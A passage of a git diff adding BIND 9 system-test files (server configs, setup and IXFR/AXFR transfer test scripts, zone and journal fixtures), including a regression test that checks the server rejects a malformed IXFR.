+ notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { none; }; + recursion no; + notify yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +view "primary" { + ixfr-from-differences yes; + request-ixfr yes; + zone "test" IN { + type secondary; + file "mytest.db"; + primaries { 10.53.0.3; }; + max-ixfr-ratio unlimited; + }; + zone "sub.test" IN { + type secondary; + file "subtest.db"; + request-ixfr no; + primaries { 10.53.0.3; }; + }; +}; diff --git a/bin/tests/system/ixfr/ns5/named.conf.in b/bin/tests/system/ixfr/ns5/named.conf.in new file mode 100644 index 0000000..b2bf6d5 --- /dev/null +++ b/bin/tests/system/ixfr/ns5/named.conf.in @@ -0,0 +1,50 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.5; + notify-source 10.53.0.5; + transfer-source 10.53.0.5; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.5; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + provide-ixfr no; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.5 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +view "primary" { + ixfr-from-differences yes; + request-ixfr yes; + zone "test" IN { + type secondary; + file "mytest.db"; + primaries { 10.53.0.3; }; + }; + zone "sub.test" IN { + type secondary; + file "subtest.db"; + request-ixfr no; + primaries { 10.53.0.3; }; + }; +}; diff --git a/bin/tests/system/ixfr/prereq.sh b/bin/tests/system/ixfr/prereq.sh new file mode 100644 index 0000000..ec369f8 --- /dev/null +++ b/bin/tests/system/ixfr/prereq.sh @@ -0,0 +1,23 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +if $PERL -e 'use Net::DNS;' 2>/dev/null +then + : +else + echo_i "This test requires the Net::DNS library." >&2 + exit 1 +fi diff --git a/bin/tests/system/ixfr/setup.sh b/bin/tests/system/ixfr/setup.sh new file mode 100644 index 0000000..c84c950 --- /dev/null +++ b/bin/tests/system/ixfr/setup.sh @@ -0,0 +1,69 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +$SHELL clean.sh + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns3/named.conf.in ns3/named.conf +copy_setports ns4/named.conf.in ns4/named.conf +copy_setports ns5/named.conf.in ns5/named.conf + +# Set up db files for zone "test" - this is a series of four +# versions of the zone, the second and third having small changes +# and the fourth having a large one. + +testdb () { + cat << EOF +\$ORIGIN $1 +\$TTL 15 +@ 15 IN SOA ns1.test. hostmaster.test. ( + $2 ; serial + 3H ; refresh + 15 ; retry + 1w ; expire + 3h ; minimum + ) + IN NS ns1.test. + IN NS ns2.test. + IN NS ns5.test. +ns1 IN A 10.53.0.3 +ns2 IN A 10.53.0.4 +ns5 IN A 10.53.0.5 +EOF + + i=0 + while [ $i -lt $3 ]; do + echo "host$i IN A 192.0.2.$i" + i=$((i+1)) + done +} + +testdb test. 1 60 > ns3/mytest.db +testdb test. 2 61 > ns3/mytest1.db +testdb test. 3 62 > ns3/mytest2.db +testdb test. 4 0 > ns3/mytest3.db + +# Set up similar db files for sub.test, which will have IXFR disabled +testdb sub.test. 1 60 > ns3/subtest.db +testdb sub.test. 3 61 > ns3/subtest1.db + +# Set up a large zone +i=0 +$SHELL ../genzone.sh 3 > ns3/large.db +while [ $i -lt 10000 ]; do + echo "record$i 10 IN TXT this is record %i" >> ns3/large.db + i=$((i+1)) +done diff --git a/bin/tests/system/ixfr/tests.sh b/bin/tests/system/ixfr/tests.sh new file mode 100644 index 0000000..1d37b45 --- /dev/null +++ b/bin/tests/system/ixfr/tests.sh @@ -0,0 +1,412 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# WARNING: The test labelled "testing request-ixfr option in view vs zone" +# is fragile because it depends upon counting instances of records +# in the log file - need a better approach <sdm> - until then, +# if you add any tests above that point, you will break the test. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +wait_for_serial() ( + $DIG $DIGOPTS "@$1" "$2" SOA > "$4" + serial=$(awk '$4 == "SOA" { print $7 }' "$4") + [ "$3" -eq "${serial:--1}" ] +) + +status=0 +n=0 + +DIGOPTS="+tcp +noadd +nosea +nostat +noquest +nocomm +nocmd -p ${PORT}" +SENDCMD="$PERL ../send.pl 10.53.0.2 ${EXTRAPORT1}" +RNDCCMD="$RNDC -p ${CONTROLPORT} -c ../common/rndc.conf -s" + +n=$((n+1)) +echo_i "testing initial AXFR ($n)" +ret=0 + +$SENDCMD <<EOF +/SOA/ +nil. 300 SOA ns.nil. root.nil. 1 300 300 604800 300 +/AXFR/ +nil. 300 SOA ns.nil. root.nil. 1 300 300 604800 300 +/AXFR/ +nil. 300 NS ns.nil. +nil. 300 TXT "initial AXFR" +a.nil. 60 A 10.0.0.61 +b.nil. 60 A 10.0.0.62 +/AXFR/ +nil. 300 SOA ns.nil. root.nil. 1 300 300 604800 300 +EOF + +sleep 1 + +# Initially, ns1 is not authoritative for anything (see setup.sh). +# Now that ans is up and running with the right data, we make it +# a secondary for nil. + +cat <<EOF >>ns1/named.conf +zone "nil" { + type secondary; + file "myftp.db"; + primaries { 10.53.0.2; }; +}; +EOF + +rndc_reload ns1 10.53.0.1 + +retry_quiet 10 wait_for_serial 10.53.0.1 nil. 1 dig.out.test$n || ret=1 + +$DIG $DIGOPTS @10.53.0.1 nil. TXT | grep 'initial AXFR' >/dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "testing successful IXFR ($n)" +ret=0 + +# We change the IP address of a.nil., and the TXT record at the apex. +# Then we do a SOA-only update. + +$SENDCMD <<EOF +/SOA/ +nil. 300 SOA ns.nil. root.nil. 3 300 300 604800 300 +/IXFR/ +nil. 300 SOA ns.nil. root.nil. 3 300 300 604800 300 +nil. 300 SOA ns.nil. root.nil. 1 300 300 604800 300 +a.nil. 60 A 10.0.0.61 +nil. 300 TXT "initial AXFR" +nil. 300 SOA ns.nil. root.nil. 2 300 300 604800 300 +nil. 300 TXT "successful IXFR" +a.nil. 60 A 10.0.1.61 +nil. 300 SOA ns.nil. root.nil. 2 300 300 604800 300 +nil. 300 SOA ns.nil. root.nil. 3 300 300 604800 300 +nil. 300 SOA ns.nil. root.nil. 3 300 300 604800 300 +EOF + +sleep 1 + +$RNDCCMD 10.53.0.1 refresh nil | sed 's/^/ns1 /' | cat_i + +sleep 2 + +$DIG $DIGOPTS @10.53.0.1 nil. TXT | grep 'successful IXFR' >/dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "testing AXFR fallback after IXFR failure (not exact error) ($n)" +ret=0 + +# Provide a broken IXFR response and a working fallback AXFR response + +$SENDCMD <<EOF +/SOA/ +nil. 300 SOA ns.nil. root.nil. 4 300 300 604800 300 +/IXFR/ +nil. 300 SOA ns.nil. root.nil. 4 300 300 604800 300 +nil. 300 SOA ns.nil. root.nil. 3 300 300 604800 300 +nil. 300 TXT "delete-nonexistent-txt-record" +nil. 300 SOA ns.nil. root.nil. 4 300 300 604800 300 +nil. 300 TXT "this-txt-record-would-be-added" +nil. 300 SOA ns.nil. root.nil. 4 300 300 604800 300 +/AXFR/ +nil. 300 SOA ns.nil. root.nil. 3 300 300 604800 300 +/AXFR/ +nil. 300 NS ns.nil. +nil. 300 TXT "fallback AXFR" +/AXFR/ +nil. 300 SOA ns.nil. root.nil. 3 300 300 604800 300 +EOF + +sleep 1 + +$RNDCCMD 10.53.0.1 refresh nil | sed 's/^/ns1 /' | cat_i + +sleep 2 + +$DIG $DIGOPTS @10.53.0.1 nil. TXT | grep 'fallback AXFR' >/dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "testing AXFR fallback after IXFR failure (bad SOA owner) ($n)" +ret=0 + +# Prepare for checking the logs later on. +nextpart ns1/named.run >/dev/null + +# Provide a broken IXFR response and a working fallback AXFR response. +$SENDCMD <<EOF +/SOA/ +nil. 300 SOA ns.nil. root.nil. 4 300 300 604800 300 +/IXFR/ +nil. 300 SOA ns.nil. root.nil. 4 300 300 604800 300 +nil. 300 SOA ns.nil. root.nil. 3 300 300 604800 300 +bad-owner. 300 SOA ns.nil. root.nil. 4 300 300 604800 300 +test.nil. 300 TXT "serial 4, malformed IXFR" +nil. 300 SOA ns.nil. root.nil. 4 300 300 604800 300 +/AXFR/ +nil. 300 SOA ns.nil. root.nil. 4 300 300 604800 300 +/AXFR/ +nil. 300 NS ns.nil. +test.nil. 300 TXT "serial 4, fallback AXFR" +/AXFR/ +nil. 300 SOA ns.nil. root.nil. 4 300 300 604800 300 +EOF +$RNDCCMD 10.53.0.1 refresh nil | sed 's/^/ns1 /' | cat_i + +# A broken server would accept the malformed IXFR and apply its contents to the +# zone. A fixed one would reject the IXFR and fall back to AXFR. Both IXFR and +# AXFR above bring the nil. zone up to serial 4, but we cannot reliably query +# for the SOA record to check whether the transfer was finished because a broken +# server would send back SERVFAIL responses to SOA queries after accepting the +# malformed IXFR. Instead, check transfer progress by querying for a TXT record +# at test.nil. which is present in both IXFR and AXFR (with different contents). +_wait_until_transfer_is_finished() { + $DIG $DIGOPTS +tries=1 +time=1 @10.53.0.1 test.nil. TXT > dig.out.test$n.1 && + grep -q -F "serial 4" dig.out.test$n.1 +} +if ! retry_quiet 10 _wait_until_transfer_is_finished; then + echo_i "timed out waiting for version 4 of zone nil. to be transferred" + ret=1 +fi + +# At this point a broken server would be serving a zone with no SOA records. +# Try crashing it by triggering a SOA refresh query. +$RNDCCMD 10.53.0.1 refresh nil | sed 's/^/ns1 /' | cat_i + +# Do not wait until the zone refresh completes - even if a crash has not +# happened by now, a broken server would never serve the record which is only +# present in the fallback AXFR, so checking for that is enough to verify if a +# server is broken or not; if it is, it is bound to crash shortly anyway. +$DIG $DIGOPTS test.nil. TXT @10.53.0.1 > dig.out.test$n.2 || ret=1 +grep -q -F "serial 4, fallback AXFR" dig.out.test$n.2 || ret=1 + +# Ensure the expected error is logged. +nextpart ns1/named.run | grep -q -F "SOA name mismatch" || ret=1 + +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "testing ixfr-from-differences option ($n)" +# ns3 is primary; ns4 is secondary +$CHECKZONE test. ns3/mytest.db > /dev/null 2>&1 +if [ $? -ne 0 ] +then + echo_i "named-checkzone returned failure on ns3/mytest.db" +fi + +retry_quiet 10 wait_for_serial 10.53.0.4 test. 1 dig.out.test$n || ret=1 + +nextpart ns4/named.run > /dev/null + +# modify the primary +sleep 1 +cp ns3/mytest1.db ns3/mytest.db +$RNDCCMD 10.53.0.3 reload | sed 's/^/ns3 /' | cat_i + +# wait for primary to reload +retry_quiet 10 wait_for_serial 10.53.0.3 test. 2 dig.out.test$n || ret=1 + +# wait for secondary to reload +tret=0 +retry_quiet 5 wait_for_serial 10.53.0.4 test. 2 dig.out.test$n || tret=1 +if [ $tret -eq 1 ]; then + # re-noitfy after 5 seconds, then wait another 10 + $RNDCCMD 10.53.0.3 notify test | set 's/^/ns3 /' | cat_i + retry_quiet 10 wait_for_serial 10.53.0.4 test. 2 dig.out.test$n || ret=1 +fi + +wait_for_log 10 'got incremental' ns4/named.run || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "testing 'request-ixfr no' option inheritance from view ($n)" +ret=0 +# There's a view with 2 zones. In the view, "request-ixfr yes" +# but in the zone "sub.test", request-ixfr no" +# we want to make sure that a change to sub.test results in AXFR, while +# changes to test. result in IXFR + +sleep 1 +cp ns3/subtest1.db ns3/subtest.db # change to sub.test zone, should be AXFR +nextpart ns4/named.run > /dev/null +$RNDCCMD 10.53.0.3 reload | sed 's/^/ns3 /' | cat_i + +# wait for primary to reload +retry_quiet 10 wait_for_serial 10.53.0.3 sub.test. 3 dig.out.test$n || ret=1 + +# wait for secondary to reload +tret=0 +retry_quiet 5 wait_for_serial 10.53.0.4 sub.test. 3 dig.out.test$n || tret=1 +if [ $tret -eq 1 ]; then + # re-noitfy after 5 seconds, then wait another 10 + $RNDCCMD 10.53.0.3 notify sub.test | set 's/^/ns3 /' | cat_i + retry_quiet 10 wait_for_serial 10.53.0.4 sub.test. 3 dig.out.test$n || ret=1 +fi + +wait_for_log 10 'got nonincremental response' ns4/named.run || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "testing 'request-ixfr yes' option inheritance from view ($n)" +ret=0 +sleep 1 +cp ns3/mytest2.db ns3/mytest.db # change to test zone, should be IXFR +nextpart ns4/named.run > /dev/null +$RNDCCMD 10.53.0.3 reload | sed 's/^/ns3 /' | cat_i + +# wait for primary to reload +retry_quiet 10 wait_for_serial 10.53.0.3 test. 3 dig.out.test$n || ret=1 + +# wait for secondary to reload +tret=0 +retry_quiet 5 wait_for_serial 10.53.0.4 test. 3 dig.out.test$n || tret=1 +if [ $tret -eq 1 ]; then + # re-noitfy after 5 seconds, then wait another 10 + $RNDCCMD 10.53.0.3 notify test | set 's/^/ns3 /' | cat_i + retry_quiet 10 wait_for_serial 10.53.0.4 test. 3 dig.out.test$n || ret=1 +fi + +wait_for_log 10 'got incremental response' ns4/named.run || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +ret=0 +echo_i "testing DiG's handling of a multi message AXFR style IXFR response ($n)" +( +(sleep 10 && kill $$) 2>/dev/null & +sub=$! +$DIG -p ${PORT} ixfr=0 large @10.53.0.3 > dig.out.test$n +kill $sub +) +lines=`grep hostmaster.large dig.out.test$n | wc -l` +test ${lines:-0} -eq 2 || ret=1 +messages=`sed -n 's/^;;.*messages \([0-9]*\),.*/\1/p' dig.out.test$n` +test ${messages:-0} -gt 1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "test 'dig +notcp ixfr=<value>' vs 'dig ixfr=<value> +notcp' vs 'dig ixfr=<value>' ($n)" +ret=0 +# Should be "switch to TCP" response +$DIG $DIGOPTS +notcp ixfr=1 test @10.53.0.4 > dig.out1.test$n || ret=1 +$DIG $DIGOPTS ixfr=1 +notcp test @10.53.0.4 > dig.out2.test$n || ret=1 +digcomp dig.out1.test$n dig.out2.test$n || ret=1 +awk '$4 == "SOA" { soacnt++} END {if (soacnt == 1) exit(0); else exit(1);}' dig.out1.test$n || ret=1 +awk '$4 == "SOA" { if ($7 == 3) exit(0); else exit(1);}' dig.out1.test$n || ret=1 +# +nextpart ns4/named.run > /dev/null +# Should be incremental transfer. +$DIG $DIGOPTS ixfr=1 test @10.53.0.4 > dig.out3.test$n || ret=1 +awk '$4 == "SOA" { soacnt++} END { if (soacnt == 6) exit(0); else exit(1);}' dig.out3.test$n || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check estimated IXFR size ($n)" +ret=0 +# note IXFR delta size will be slightly bigger with version 1 transaction +# headers as there is no correction for the overall record length storage. +# Ver1 = 4 * (6 + 10 + 10 + 17 + 5 * 4) + 2 * (13 + 10 + 4) + (6 * 4) = 330 +# Ver2 = 4 * (6 + 10 + 10 + 17 + 5 * 4) + 2 * (13 + 10 + 4) = 306 +nextpart ns4/named.run | grep "IXFR delta size (306 bytes)" > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# make sure ns5 has transfered the zone +# wait for secondary to reload +tret=0 +retry_quiet 5 wait_for_serial 10.53.0.5 test. 4 dig.out.test$n || tret=1 +if [ $tret -eq 1 ]; then + # re-noitfy after 5 seconds, then wait another 10 + $RNDCCMD 10.53.0.3 notify test | set 's/^/ns3 /' | cat_i + retry_quiet 10 wait_for_serial 10.53.0.5 test. 3 dig.out.test$n || ret=1 +fi + +n=$((n+1)) +echo_i "test 'provide-ixfr no;' (serial < current) ($n)" +ret=0 +nextpart ns5/named.run > /dev/null +# Should be "AXFR style" response +$DIG $DIGOPTS ixfr=1 test @10.53.0.5 > dig.out1.test$n || ret=1 +# Should be "switch to TCP" response +$DIG $DIGOPTS ixfr=1 +notcp test @10.53.0.5 > dig.out2.test$n || ret=1 +awk '$4 == "SOA" { soacnt++} END {if (soacnt == 2) exit(0); else exit(1);}' dig.out1.test$n || ret=1 +awk '$4 == "SOA" { soacnt++} END {if (soacnt == 1) exit(0); else exit(1);}' dig.out2.test$n || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking whether dig calculates IXFR statistics correctly ($n)" +ret=0 +$DIG $DIGOPTS +noedns +stat -b 10.53.0.4 @10.53.0.4 test. ixfr=2 > dig.out1.test$n +get_dig_xfer_stats dig.out1.test$n > stats.dig +diff ixfr-stats.good stats.dig > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Note: in the next two tests, we use ns4 logs for checking both incoming and +# outgoing transfer statistics as ns4 is both a secondary server (for ns3) and a +# primary server (for dig queries from the previous test) for "test". + +_wait_for_stats () { + get_named_xfer_stats ns4/named.run "$1" test "$2" > "$3" + diff ixfr-stats.good "$3" > /dev/null || return 1 + return 0 +} + +n=$((n+1)) +echo_i "checking whether named calculates incoming IXFR statistics correctly ($n)" +ret=0 +retry_quiet 10 _wait_for_stats 10.53.0.3 "Transfer completed" stats.incoming || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking whether named calculates outgoing IXFR statistics correctly ($n)" +retry_quiet 10 _wait_for_stats 10.53.0.4 "IXFR ended" stats.outgoing || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +ret=0 +echo_i "testing fallback to AXFR when max-ixfr-ratio is exceeded ($n)" +nextpart ns4/named.run > /dev/null + +sleep 1 +cp ns3/mytest3.db ns3/mytest.db # change to test zone, too big for IXFR +$RNDCCMD 10.53.0.3 reload | sed 's/^/ns3 /' | cat_i + +# wait for secondary to reload +tret=0 +retry_quiet 5 wait_for_serial 10.53.0.4 test. 4 dig.out.test$n || tret=1 +if [ $tret -eq 1 ]; then + # re-noitfy after 5 seconds, then wait another 10 + $RNDCCMD 10.53.0.3 notify test | set 's/^/ns3 /' | cat_i + retry_quiet 10 wait_for_serial 10.53.0.4 test. 4 dig.out.test$n || ret=1 +fi + +wait_for_log 10 'got nonincremental response' ns4/named.run || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/journal/clean.sh b/bin/tests/system/journal/clean.sh new file mode 100644 index 0000000..adab870 --- /dev/null +++ b/bin/tests/system/journal/clean.sh @@ -0,0 +1,22 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f */*.db */*.jnl +rm -f */named.conf +rm -f */named.memstats +rm -f */named.run +rm -f dig.out* +rm -f journalprint.out.* +rm -f ns1/managed-keys.bind +rm -f ns2/managed-keys.bind +rm -f tmp.jnl diff --git a/bin/tests/system/journal/ns1/changed.ver1.jnl.saved b/bin/tests/system/journal/ns1/changed.ver1.jnl.saved Binary files differnew file mode 100644 index 0000000..b449a7d --- /dev/null +++ b/bin/tests/system/journal/ns1/changed.ver1.jnl.saved diff --git a/bin/tests/system/journal/ns1/changed.ver2.jnl.saved b/bin/tests/system/journal/ns1/changed.ver2.jnl.saved Binary files differnew file mode 100644 index 0000000..d2fa199 --- /dev/null +++ b/bin/tests/system/journal/ns1/changed.ver2.jnl.saved diff --git a/bin/tests/system/journal/ns1/d1212.jnl.saved b/bin/tests/system/journal/ns1/d1212.jnl.saved Binary files differnew file mode 100644 index 0000000..57c1497 --- /dev/null +++ b/bin/tests/system/journal/ns1/d1212.jnl.saved diff --git a/bin/tests/system/journal/ns1/d2121.jnl.saved b/bin/tests/system/journal/ns1/d2121.jnl.saved Binary files differnew file mode 100644 index 0000000..ec21372 --- /dev/null +++ b/bin/tests/system/journal/ns1/d2121.jnl.saved diff --git a/bin/tests/system/journal/ns1/generic.db.in b/bin/tests/system/journal/ns1/generic.db.in new file mode 100644 index 0000000..55669d7 --- /dev/null +++ b/bin/tests/system/journal/ns1/generic.db.in @@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ SOA ns hostmaster 2012010901 3600 1200 604800 1200 + NS ns +ns A 192.0.2.1 + +addr1 A 10.53.0.1 diff --git a/bin/tests/system/journal/ns1/ixfr.db.in b/bin/tests/system/journal/ns1/ixfr.db.in new file mode 100644 index 0000000..0cb1184 --- /dev/null +++ b/bin/tests/system/journal/ns1/ixfr.db.in @@ -0,0 +1,18 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ SOA ns hostmaster 2012010902 3600 1200 604800 1200 + NS ns +ns A 192.0.2.1 + +addr1 A 10.53.0.1 +addr2 A 10.53.0.2 diff --git a/bin/tests/system/journal/ns1/ixfr.ver1.jnl.saved b/bin/tests/system/journal/ns1/ixfr.ver1.jnl.saved Binary files differnew file mode 100644 index 0000000..10b5116 --- /dev/null +++ b/bin/tests/system/journal/ns1/ixfr.ver1.jnl.saved diff --git a/bin/tests/system/journal/ns1/managed-keys.bind.in b/bin/tests/system/journal/ns1/managed-keys.bind.in new file mode 100644 index 0000000..923e98b --- /dev/null +++ b/bin/tests/system/journal/ns1/managed-keys.bind.in @@ -0,0 +1,2 @@ +. 0 IN SOA . . 3297 0 0 0 0 +. 0 IN TYPE65533 \# 276 60621140598E0A83000000000101030803010001ACFFB409BCC939F8 31F7A1E5EC88F7A59255EC53040BE432027390A4CE896D6F9086F3C5 E177FBFE118163AAEC7AF1462C47945944C4E2C026BE5E98BBCDED25 978272E1E3E079C5094D573F0E83C92F02B32D3513B1550B826929C8 0DD0F92CAC966D17769FD5867B647C3F38029ABDC48152EB8F207159 ECC5D232C7C1537C79F4B7AC28FF11682F21681BF6D6ABA555032BF6 F9F036BEB2AAA5B3778D6EEBFBA6BF9EA191BE4AB0CAEA759E2F773A 1F9029C73ECB8D5735B9321DB085F1B8E2D8038FE2941992548CEE0D 67DD4547E11DD63AF9C9FC1C5466FB684CF009D7197C2CF79E792AB5 01E6A8A1CA519AF2CB9B5F6367E94C0D47502451357BE1B5 diff --git a/bin/tests/system/journal/ns1/managed-keys.bind.jnl.in b/bin/tests/system/journal/ns1/managed-keys.bind.jnl.in new file mode 100644 index 0000000..a63f91c --- /dev/null +++ b/bin/tests/system/journal/ns1/managed-keys.bind.jnl.in @@ -0,0 +1,704 @@ +3b42494e44204c4f472056390a000000 +00000cd20000020000000ce200002bf8 +00000038000000000000000000000000 +00000000000000000000000000000000 +00000cd20000020000000cd30000049c +00000cd40000073800000cd5000009d8 +00000cd600000c7800000cd700000f18 +00000cd8000011b800000cd900001458 +00000cda000016f800000cdb00001998 +00000cdc00001c3800000cdd00001ed8 +00000cde0000217800000cdf00002418 +00000ce0000026b800000ce100002958 +00000000000000000000000000000000 +00000000000000000000000000000000 +00000000000000000000000000000000 +00000000000000000000000000000000 +00000000000000000000000000000000 +00000000000000000000000000000000 +00000000000000000000000000000000 +00000000000000000000000000000000 +00000000000000000000000000000000 +00000000000000000000000000000000 +00000000000000000000000000000000 +00000000000000000000000000000000 +00000000000000000000000000000000 +00000000000000000000000000000000 +00000000000000000000000000000000 +00000000000000000000000000000000 +00000000000000000000000000000000 +00000000000000000000000000000000 +00000000000000000000000000000000 +00000000000000000000000000000000 +0000029000000cd200000cd300000021 +0000060001000000000016000000000c +d2000000000000000000000000000000 +000000011f00fffd0001000000000114 +6058a4c2598e0a830000000001010308 +03010001acffb409bcc939f831f7a1e5 +ec88f7a59255ec53040be432027390a4 +ce896d6f9086f3c5e177fbfe118163aa +ec7af1462c47945944c4e2c026be5e98 +bbcded25978272e1e3e079c5094d573f +0e83c92f02b32d3513b1550b826929c8 +0dd0f92cac966d17769fd5867b647c3f +38029abdc48152eb8f207159ecc5d232 +c7c1537c79f4b7ac28ff11682f21681b +f6d6aba555032bf6f9f036beb2aaa5b3 +778d6eebfba6bf9ea191be4ab0caea75 +9e2f773a1f9029c73ecb8d5735b9321d +b085f1b8e2d8038fe2941992548cee0d +67dd4547e11dd63af9c9fc1c5466fb68 +4cf009d7197c2cf79e792ab501e6a8a1 +ca519af2cb9b5f6367e94c0d47502451 +357be1b5000000210000060001000000 +000016000000000cd300000000000000 +0000000000000000000000011f00fffd +00010000000001146058e4a0598e0a83 +000000000101030803010001acffb409 +bcc939f831f7a1e5ec88f7a59255ec53 +040be432027390a4ce896d6f9086f3c5 +e177fbfe118163aaec7af1462c479459 +44c4e2c026be5e98bbcded25978272e1 +e3e079c5094d573f0e83c92f02b32d35 +13b1550b826929c80dd0f92cac966d17 +769fd5867b647c3f38029abdc48152eb +8f207159ecc5d232c7c1537c79f4b7ac +28ff11682f21681bf6d6aba555032bf6 +f9f036beb2aaa5b3778d6eebfba6bf9e +a191be4ab0caea759e2f773a1f9029c7 +3ecb8d5735b9321db085f1b8e2d8038f +e2941992548cee0d67dd4547e11dd63a +f9c9fc1c5466fb684cf009d7197c2cf7 +9e792ab501e6a8a1ca519af2cb9b5f63 +67e94c0d47502451357be1b500000290 +00000cd300000cd40000002100000600 +01000000000016000000000cd3000000 +00000000000000000000000000000001 +1f00fffd00010000000001146058e4a0 +598e0a83000000000101030803010001 +acffb409bcc939f831f7a1e5ec88f7a5 +9255ec53040be432027390a4ce896d6f +9086f3c5e177fbfe118163aaec7af146 +2c47945944c4e2c026be5e98bbcded25 +978272e1e3e079c5094d573f0e83c92f +02b32d3513b1550b826929c80dd0f92c +ac966d17769fd5867b647c3f38029abd +c48152eb8f207159ecc5d232c7c1537c +79f4b7ac28ff11682f21681bf6d6aba5 +55032bf6f9f036beb2aaa5b3778d6eeb +fba6bf9ea191be4ab0caea759e2f773a +1f9029c73ecb8d5735b9321db085f1b8 +e2d8038fe2941992548cee0d67dd4547 +e11dd63af9c9fc1c5466fb684cf009d7 +197c2cf79e792ab501e6a8a1ca519af2 +cb9b5f6367e94c0d47502451357be1b5 +00000021000006000100000000001600 +0000000cd40000000000000000000000 +00000000000000011f00fffd00010000 +000001146059f642598e0a8300000000 +0101030803010001acffb409bcc939f8 +31f7a1e5ec88f7a59255ec53040be432 +027390a4ce896d6f9086f3c5e177fbfe +118163aaec7af1462c47945944c4e2c0 +26be5e98bbcded25978272e1e3e079c5 +094d573f0e83c92f02b32d3513b1550b +826929c80dd0f92cac966d17769fd586 +7b647c3f38029abdc48152eb8f207159 +ecc5d232c7c1537c79f4b7ac28ff1168 +2f21681bf6d6aba555032bf6f9f036be +b2aaa5b3778d6eebfba6bf9ea191be4a +b0caea759e2f773a1f9029c73ecb8d57 +35b9321db085f1b8e2d8038fe2941992 +548cee0d67dd4547e11dd63af9c9fc1c +5466fb684cf009d7197c2cf79e792ab5 +01e6a8a1ca519af2cb9b5f6367e94c0d +47502451357be1b50000029000000cd4 